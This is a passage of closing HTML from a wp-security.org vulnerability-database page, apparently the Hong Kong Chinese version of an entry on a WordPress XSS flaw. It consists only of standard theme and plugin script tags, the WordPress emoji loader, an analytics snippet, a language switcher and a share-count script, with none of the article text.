<script id="disqus_embed-js" src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.1.4"></script>
<script id="powerkit-basic-elements-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/basic-elements/public/js/public-powerkit-basic-elements.js?ver=4.0.0"></script>
<script id="justifiedgallery-js" src="https://wp-security.org/wp-content/plugins/canvas/components/justified-gallery/block/jquery.justifiedGallery.min.js?ver=2.5.3"></script>
<script id="powerkit-justified-gallery-js-extra">
var powerkitJG = {"rtl":""};
//# sourceURL=powerkit-justified-gallery-js-extra
</script>
<script id="powerkit-justified-gallery-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/justified-gallery/public/js/public-powerkit-justified-gallery.js?ver=3.0.7"></script>
<script id="imagesloaded-js" src="https://wp-security.org/wp-includes/js/imagesloaded.min.js?ver=5.0.0"></script>
<script id="glightbox-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/glightbox.min.js?ver=3.0.7"></script>
<script id="powerkit-lightbox-js-extra">
var powerkit_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of","single_image_selectors":".entry-content img,.single .post-media img","gallery_selectors":".wp-block-gallery,.gallery","exclude_selectors":".sight-portfolio-area","zoom_icon":"1"};
//# sourceURL=powerkit-lightbox-js-extra
</script>
<script id="powerkit-lightbox-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/public-powerkit-lightbox.js?ver=3.0.7"></script>
<script id="powerkit-opt-in-forms-js-extra">
var opt_in = {"ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","warning_privacy":"Please confirm that you agree with our policies.","is_admin":"","server_error":"Server error occurred. Please try again later."};
//# sourceURL=powerkit-opt-in-forms-js-extra
</script>
<script id="powerkit-opt-in-forms-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/opt-in-forms/public/js/public-powerkit-opt-in-forms.js?ver=3.0.7"></script>
<script id="powerkit-pinterest-js" async="async" defer="defer" src="//assets.pinterest.com/js/pinit.js?ver=7.0"></script>
<script id="powerkit-pin-it-js-extra">
var powerkit_pinit_localize = {"image_selectors":".entry-content img","exclude_selectors":".cnvs-block-row,.cnvs-block-section,.cnvs-block-posts .entry-thumbnail,.cnvs-post-thumbnail,.pk-block-author,.pk-featured-categories img,.pk-inline-posts-container img,.pk-instagram-image,.pk-subscribe-image,.wp-block-cover,.pk-block-posts,.sight-portfolio-entry-link-page","only_hover":"1"};
//# sourceURL=powerkit-pin-it-js-extra
</script>
<script id="powerkit-pin-it-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/pinterest/public/js/public-powerkit-pin-it.js?ver=3.0.7"></script>
<script id="powerkit-scroll-to-top-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/scroll-to-top/public/js/public-powerkit-scroll-to-top.js?ver=3.0.7"></script>
<script id="powerkit-share-buttons-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/share-buttons/public/js/public-powerkit-share-buttons.js?ver=3.0.7"></script>
<script id="flickity-js" src="https://wp-security.org/wp-content/plugins/canvas/components/slider-gallery/block/flickity.pkgd.min.js?ver=2.5.3"></script>
<script id="powerkit-slider-gallery-js-extra">
var powerkit_sg_flickity = {"page_info_sep":" of "};
//# sourceURL=powerkit-slider-gallery-js-extra
</script>
<script id="powerkit-slider-gallery-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/slider-gallery/public/js/public-powerkit-slider-gallery.js?ver=3.0.7"></script>
<script id="powerkit-table-of-contents-js-extra">
var powerkit_toc_config = {"label_show":"Show","label_hide":"Hide"};
//# sourceURL=powerkit-table-of-contents-js-extra
</script>
<script id="powerkit-table-of-contents-js" src="https://wp-security.org/wp-content/plugins/powerkit/modules/table-of-contents/public/js/public-powerkit-table-of-contents.js?ver=3.0.7"></script>
<script id="magnific-popup-js" src="https://wp-security.org/wp-content/plugins/sight/render/js/jquery.magnific-popup.min.js?ver=1774098503"></script>
<script id="sight-block-script-js-extra">
var sight_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of"};
//# sourceURL=sight-block-script-js-extra
</script>
<script id="sight-block-script-js" src="https://wp-security.org/wp-content/plugins/sight/render/js/sight.js?ver=1774098503"></script>
<script id="colcade-js" src="https://wp-security.org/wp-content/plugins/canvas/components/posts/block-posts/colcade.js?ver=2.5.3"></script>
<script id="object-fit-images-js" src="https://wp-security.org/wp-content/themes/squaretype/js/ofi.min.js?ver=3.2.3"></script>
<script id="csco-scripts-js-extra">
var csco_mega_menu = {"rest_url":"https://wp-security.org/zh/wp-json/csco/v1/menu-posts","current_lang":"","current_locale":"zh_HK"};
//# sourceURL=csco-scripts-js-extra
</script>
<script id="csco-scripts-js" src="https://wp-security.org/wp-content/themes/squaretype/js/scripts.js?ver=3.1.1"></script>
<script async data-wp-strategy="async" fetchpriority="low" id="comment-reply-js" src="https://wp-security.org/wp-includes/js/comment-reply.min.js?ver=7.0"></script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://wp-security.org/wp-includes/js/wp-emoji-release.min.js?ver=7.0"}}
</script>
<script type="module">
/*! This file is auto-generated */
const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))});
//# sourceURL=https://wp-security.org/wp-includes/js/wp-emoji-loader.min.js
</script>
<div style="position:absolute;margin:-1px;padding:0;height:1px;width:1px;overflow:hidden;clip-path:inset(50%);border:0;word-wrap:normal !important;"><p id="a11y-speak-intro-text" class="a11y-speak-intro-text" hidden data-no-translation="" data-trp-gettext="">通知</p><div id="a11y-speak-assertive" class="a11y-speak-region" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"></div><div id="a11y-speak-polite" class="a11y-speak-region" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div></div>
<!-- Usermaven - privacy-friendly analytics tool -->
<script type="text/javascript">
(function () {
window.usermaven = window.usermaven || (function () { (window.usermavenQ = window.usermavenQ || []).push(arguments); })
var t = document.createElement('script'),
s = document.getElementsByTagName('script')[0];
t.defer = true;
t.id = 'um-tracker';
t.setAttribute('data-tracking-host', 'https://u.wp-security.org');
t.setAttribute('data-key', 'UMZaYew9Sp');
t.setAttribute('data-autocapture', 'true'); t.setAttribute('data-randomize-url', 'true');
t.src = 'https://u.wp-security.org/lib.js';
s.parentNode.insertBefore(t, s);
})();
</script>
<!-- / Usermaven -->
<nav
class="trp-language-switcher trp-floating-switcher trp-ls-dropdown trp-switcher-position-bottom"
style="--bg:#ffffffb2;--bg-hover:#0000000d;--text:#000000;--text-hover:#000000;--border:1px solid transparent;--border-radius:8px 8px 0px 0px;--flag-radius:2px;--flag-size:20px;--aspect-ratio:4/3;--font-size:16px;--switcher-width:auto;--switcher-padding:10px 0;--transition-duration:0.2s;--bottom:0px;--right:10vw"
role="navigation"
aria-label="網站語言選擇器"
data-no-translation
>
<div class="trp-language-switcher-inner">
<div class="trp-language-item trp-language-item__current" title="Chinese (Hong Kong)" role="button" tabindex="0" aria-expanded="false" aria-label="Change language" aria-controls="trp-switcher-dropdown-list" data-no-translation><span class="trp-language-item-name">Chinese (Hong Kong)</span></div>
<div
class="trp-switcher-dropdown-list"
id="trp-switcher-dropdown-list"
role="group"
aria-label="可用語言"
hidden
inert
>
<a href="https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="English" data-no-translation><span class="trp-language-item-name">English</span></a> <a href="https://wp-security.org/zh_cn/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Chinese (China)" data-no-translation><span class="trp-language-item-name">Chinese (China)</span></a> <a href="https://wp-security.org/es/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Spanish" data-no-translation><span class="trp-language-item-name">Spanish</span></a> <a href="https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Hindi" data-no-translation><span class="trp-language-item-name">Hindi</span></a> <a href="https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="French" data-no-translation><span class="trp-language-item-name">French</span></a> </div>
</div>
</nav>
<script type="text/javascript">
"use strict";
(function($) {
$( window ).on( 'load', function() {
// Each All Share boxes.
$( '.pk-share-buttons-mode-rest' ).each( function() {
var powerkitButtonsIds = [],
powerkitButtonsBox = $( this );
// Check Counts.
if ( ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-counts' ) && ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) ) {
return;
}
powerkitButtonsBox.find( '.pk-share-buttons-item' ).each( function() {
if ( $( this ).attr( 'data-id' ).length > 0 ) {
powerkitButtonsIds.push( $( this ).attr( 'data-id' ) );
}
});
// Generate accounts data.
var powerkitButtonsData = {};
if( powerkitButtonsIds.length > 0 ) {
powerkitButtonsData = {
'ids' : powerkitButtonsIds.join(),
'post_id' : powerkitButtonsBox.attr( 'data-post-id' ),
'url' : powerkitButtonsBox.attr( 'data-share-url' ),
};
}
// Get results by REST API.
$.ajax({
type: 'GET',
url: 'https://wp-security.org/zh/wp-json/social-share/v1/get-shares',
data: powerkitButtonsData,
beforeSend: function(){
// Add Loading Class.
powerkitButtonsBox.addClass( 'pk-share-buttons-loading' );
},
success: function( response ) {
if ( ! $.isEmptyObject( response ) && ! response.hasOwnProperty( 'code' ) ) {
// Accounts loop.
$.each( response, function( index, data ) {
if ( index !== 'total_count' ) {
// Find Bsa Item.
var powerkitButtonsItem = powerkitButtonsBox.find( '.pk-share-buttons-item[data-id="' + index + '"]');
// Set Count.
if ( data.hasOwnProperty( 'count' ) && data.count ) {
powerkitButtonsItem.removeClass( 'pk-share-buttons-no-count' ).addClass( 'pk-share-buttons-item-count' );
powerkitButtonsItem.find( '.pk-share-buttons-count' ).html( data.count );
} else {
powerkitButtonsItem.addClass( 'pk-share-buttons-no-count' );
}
}
});
if ( powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) && response.hasOwnProperty( 'total_count' ) ) {
var powerkitButtonsTotalBox = powerkitButtonsBox.find( '.pk-share-buttons-total' );
if ( response.total_count ) {
powerkitButtonsTotalBox.find( '.pk-share-buttons-count' ).html( response.total_count );
powerkitButtonsTotalBox.show().removeClass( 'pk-share-buttons-total-no-count' );
}
}
}
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
},
error: function() {
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
}
});
});
});
})(jQuery);
</script>
</body>
</html>
<!--
Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com
使用 PhpRedis (v6.3.0) 從 Redis 中檢索到 11028 物件 (1 MB)。.
-->